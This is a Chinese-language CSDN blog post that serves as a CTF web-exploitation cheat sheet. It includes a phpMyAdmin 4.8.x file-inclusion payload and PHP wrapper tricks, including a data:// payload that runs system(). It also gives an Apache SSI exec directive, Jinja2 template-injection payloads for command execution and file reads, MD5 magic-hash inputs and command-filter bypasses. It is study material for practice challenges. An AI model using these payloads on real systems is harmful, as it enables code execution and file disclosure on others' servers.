web ctf note

最新推荐文章于 2024-05-19 09:56:32 发布
最新推荐文章于 2024-05-19 09:56:32 发布
阅读量299 收藏
点赞数
分类专栏: ctf web 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50967960/article/details/115386906
版权
web 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
ctf
6 篇文章 0 订阅
订阅专栏

目录

phpMyAdmin 4.8.x 本地文件包含漏洞利用

读取flag文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

why? (%253f )

由于多了第二次的解码和判断,导致当传入二次编码的?(即%253f)时会取出导致db_sql.php作为参数从而绕过白名单进而达到文件读取的目的

变量覆盖漏洞

https://blog.csdn.net/qq_43622442/article/details/105925473

PHP伪协议中的data://

用法:data://text/plain;base64,
eg ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKTs/Pg==

MD5

MD5值相同的两组不同字符

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

QNKCDZO
240610708
一开始以为是要寻找MD5碰撞的例子,后来想了想不应该这么复杂,就发现了PHP有个隐式转换的缺陷,PHP在处理哈希字符串时,会利用”!=”或””来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,(当出现xex模式的时候代表科学计数法)所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
当然,安全的比较方法是三个=,也就是“===”。

md5加密前后数值相等
PHP弱类型总结
哈希函数md5().hexdigest()
WUSTCTF2020朴实无华–WP

0e215962017

import hashlib #$md5==md5($md5)
v0='0e'
for v1 in '0123456789':
    for v2 in '0123456789':
        for v3 in '0123456789':
            for v4 in '0123456789':
                for v5 in '0123456789':
                    for v6 in '0123456789':
                        for v7 in '0123456789':
                            for v8 in '0123456789':
                                for v9 in '0123456789':
                                    for v10 in '0123456789':
                                        for v11 in '0123456789':
                                            for v12 in '0123456789':
                                                for v13 in '0123456789':
                                                    v = v0+v1 + v2 + v3 + v4 + v5 + v6+v7+v8+v9+v10+v11+v12+v13
                                                    m = hashlib.md5() #获取一个md5加密算法对象
                                                    m.update(v.encode("utf-8"))#要对哪个字符串进行加密,就放这里
                                                    n = m.hexdigest()#获取加密后的16进制字符串
                                                    if n[0:2] == '0e' and n[2:].isdigit():#要求前两位是0e,然后后面只有数字构成
                                                        print(v)

[MRCTF2020]套娃

https://www.freesion.com/article/8725512564/

jsfuck编码 、反写

UTF-8与Unicode

Unicode字符大全

https://www.compart.com/en/unicode/

函数转换

base_convert():
在这里插入图片描述
dechex:将10进制转化为16进制
hex2bin:16进制转换为ASCII字符

获取PHP源码

  1. php伪协议
php://input:使用条件:include()、include_once()、file_get_contents()

enctype=”multipart/form-data” 的时候 php://input 是无效的
  1. php://output
是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区
  1. php://filter
php://filter/convert.base64-encode/resource=index.php

在这里插入图片描述
源码中的写法:

  1. List item
include($file.'php') 或者 include($file)

这里直接使用伪协议包含:

?file = php://filter/read=convert.base64-encode/resource=login?action = xxx & mode = xxx

include($action.'/'.$mode.'.php');

对于这种情况使用的伪协议包含形式:

?action=php://filter/read=convert.base64-encode/resource=./&mode=login

参考源->

https://blog.csdn.net/weixin_39580682/article/details/115144055

反序列化逃逸

两种对象:

  1. 第一种:关键词数增加
    例如: where->hacker,这样词数由五个增加到6个
  2. 第二种:关键词数减少
    例如:直接过滤掉一些关键词
    way:值逃逸、键逃逸

[安洵杯 2019]easy_serialize_php 脑壳大!!!!
https://www.cnblogs.com/h3zh1/p/12732336.html

mysql之无列名注入

https://zhuanlan.zhihu.com/p/98206699

intval()函数

如果intval函数参数填入科学计数法的字符串,会以e前面的数字作为返回值,而对于科学计数法+数字则会返回字符串类型
在这里插入图片描述

命令执行 绕过方法

https://www.fujieace.com/penetration-test/command-bypass.html
eg: 空格绕过 $IFC$9${IFC}

NMAP

-il /etc/pass 任意文件中读取要扫描的文件
-o /tmp/1 把扫描文件输出到一个地方
escapeshellarg()+escapeshellcmd()

extractvalue和updatexml进行报错注入

[极客大挑战 2019]HardSQL 1
EXTRACTVALUE https://blog.csdn.net/SopRomeo/article/details/104041233/
UPDATAEXML https://www.cnblogs.com/wangtanzhi/p/12257412.html

CBC字节翻转攻击

2021ISCC ISCC客服一号冲冲冲(二)
注意:cookie里面数据转url格式
https://blog.csdn.net/zpy1998zpy/article/details/80684485
https://blog.csdn.net/jvkyvly/article/details/116755861

PHP assert()函数

assert 判断一个表达式是否成立
assert()可以将整个字符串参数当作php参数执行。
所以构造木马
eg: [NPUCTF2020]ReadlezPHP1

Apache SSI远程命令执行漏洞

SSI(服务器包含)是放在HTML页面中的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
eg
环境:文件上传,php文件被禁止上传
根据SSI的特性上传一个shtml文件
<!--#exec cmd="whoami" -->

SSTI模板注入漏洞

smarty ssti
{$smarty.version} 返回的smarty的版本号
eg: [CISCN2019 华东南赛区]Web111

Flask jinja2模板注入思路总结

py3

#命令执行:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
#文件操作
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}

https://blog.csdn.net/qq_27446553/article/details/79379136
靶场:https://buuoj.cn/challenges#[GYCTF2020]FlaskApp

[CISCN2019 总决赛 Day2 Web1]Easyweb1

脚本思路

https://www.cnblogs.com/kevinbruce656/p/12631048.html

二次注入

[RCTF2015]EasySQL

  • sql二次注入
  • 使用reverse()函数,将查询结果倒序输出

regexp

[NCTF2019]SQLi 1
wp

[HarekazeCTF2019]encode_and_encode

1.json字符转义
2.php伪协议
php://filter/convert.base64-encode/resource=

RETRY

[0CTF 2016]piapiapia
wp:https://blog.csdn.net/qq_43622442/article/details/105751356

PHP中的字符替代

%09代替 空格

落魚京
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFNote:CTFNote是一种协作工具,旨在帮助CTF团队组织工作
04-12
周大福 欢迎 CTFNote是一种协作工具,旨在帮助CTF团队组织工作。 安装 使用提供的docker配置来部署项目: $ docker-compose up -d 然后,访问127.0.0.1并创建您的第一个帐户,该帐户将自动具有管理员权限 您可以根据需要选择编辑API配置文件: 礼遇 ADMIN_ALL:可以创建CTF,任务,编辑用户/配置。 EDIT_CTF:可以创建和修改CTF信息; 您应该将此权利授予您的队长 CTF_ALL:可以加入每个CTF; 您应该将此权利授予您的团队成员。 无权限:只能在受邀时查看CTF; 这用于不定期的客人。 允许CTF来宾创建和编辑任务,但不允许创建和编辑任务。 发展 开发服务器包括一个简单的HTTP代理,允许前端访问本地API(cf )。 同时在两个组件上都配置了热重装。 设置并启动前端 $ cd front/ $ yarn instal
ctf_notes:通过进行大量CTF收集的笔记,以帮助进一步的CTF
04-14
ctf_notes 通过进行大量CTF收集的笔记,以帮助进一步的CTF -------------------------------------------------- --------------------------------------- Windows和* nix: -密码喷涂: crackmapexec [模块] -u [users.txt] -p [passwords.txt] [ip或ip范围] -bruteforce(可能需要更多选项,使用的示例是SSH模块): medusa -h [ip] -U [users.txt] -P [passwords.txt] -M [模块] [ip] 一般注意事项: 已知的主机ssh文件将显示该主机已通过SSH进入的所有主机 -重置中断的终端会话的命令 $>重置 -使用私有rsa而不是密码的ssh: ssh -i
探索网络安全的宝藏库:全方位渗透测试资源集合
最新发布
gitblog_00055的博客
05-19 258
探索网络安全的宝藏库:全方位渗透测试资源集合 项目地址:https://gitcode.com/Shiva108/CTF-notes 项目介绍 在网络安全的世界里,攻与防的较量从未停止,而渗透测试是确保系统安全的关键一环。这个开源项目是一个综合性的资料库,汇集了大量关于渗透测试和红队操作的知识点,包括操作系统漏洞利用、缓冲区溢出、后渗透技巧以及各种攻击手法。无论你是准备OSCP考试的新手,还是寻求...
CTF特训日记day2
weixin_46483787的博客
12-06 534
day2打了一个叫NBCTF的比赛做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。
ByteCTF note_five 经验总结
qq_43189757的博客
10-10 801
每到接触新知识得时候总要花不少力气搞懂(汗,这题是关于改写global_max_fast 再通过fastbin attack来getshell, 总结一下学到的知识点和解题思路 思路: 这题限制了chunk的size, 大小为0x8f~0x0x400,在edit info 函数处存在 off-by-one 漏洞,通过这个漏洞可以改写chunk的size 一开始的思路是创建几个chunk,然后通过修...
[HarekazeCTF2019]Easy Notes
qq_43801002的博客
04-27 1129
#题目 *有源码,是一个笔记本系统 *在登陆处进行了匹配,只允许输入 4 到 64 位规定字符,且不是前端验证 *点击get flag提示不是admin #flag.php <section> <h2>Get flag</h2> <p> <?php if (is_a...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF工具之御剑后台扫描(web).rar
09-16
CTF工具之御剑后台扫描(Web)】 在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,参赛者通过解决各种安全问题来获取分数。御剑后台扫描工具是专门为CTF比赛设计的一款Web渗透测试工具,主要用于...
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
CTF Web资料.zip
09-27
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取虚拟旗帜,这些挑战涵盖了网络攻防、密码学、逆向工程、Web安全等多个领域。在这个"CTF Web资料.zip"压缩包中,我们可以期待找到与Web...
WEBUPDATE(在线升级专家)
02-23
用于网络升级的控件,使用方便。自动检索Internet或Intranet上的程序升级版本。可通过HTTP、FTP检索文件升级版本。等等......总之是我见到的此类控件中功能最全的。
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 472
[HarekazeCTF2019]Easy Notes(session伪造)
2016 ZCTF note2
Morphy_Amo的博客
01-27 2614
堆溢出中unlink的应用
[HarekazeCTF2019]Easy Notes-代码审计
leekos的博客,分享web安全相关知识~
08-24 192
会被替换为空,所以最终文件名就符合session文件的格式了,session文件名可控。目录下面,所以我们可以尝试session伪造一下,伪造一个session文件。如果我们能够控制session文件,就可以拿到flag了。登录之后有几个功能点,可以添加节点,然后使用。我们发现想要拿到flag的条件时。这里可以看到,导出的文件也是写到。会生成16进制字符串,
CTF日常训练WriteUp之CTF秀靶场,2024年最新靠着这份900多页的PDF面试整理
2401_84159911的博客
04-15 369
做完两道题型,发现需要了解的知识点:(1)熟悉栅栏密码特性:把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话;(2)熟悉使用工具010-editor,知道图片可以使用工具16进制读取以及存储内容,可以联想到我们web渗透中的图片马样式。
UNCTF2022 wp
网安小菜鸡
01-16 1228
UNCTF2022 wp
webCTF文件包含
04-24
WebCTF文件包含是一种常见的Web安全漏洞,也被称为文件包含漏洞。它指的是在Web应用程序中,未正确过滤用户输入导致恶意用户可以通过构造特定的请求,将本应该被限制访问的文件包含到页面中。 文件包含漏洞通常存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值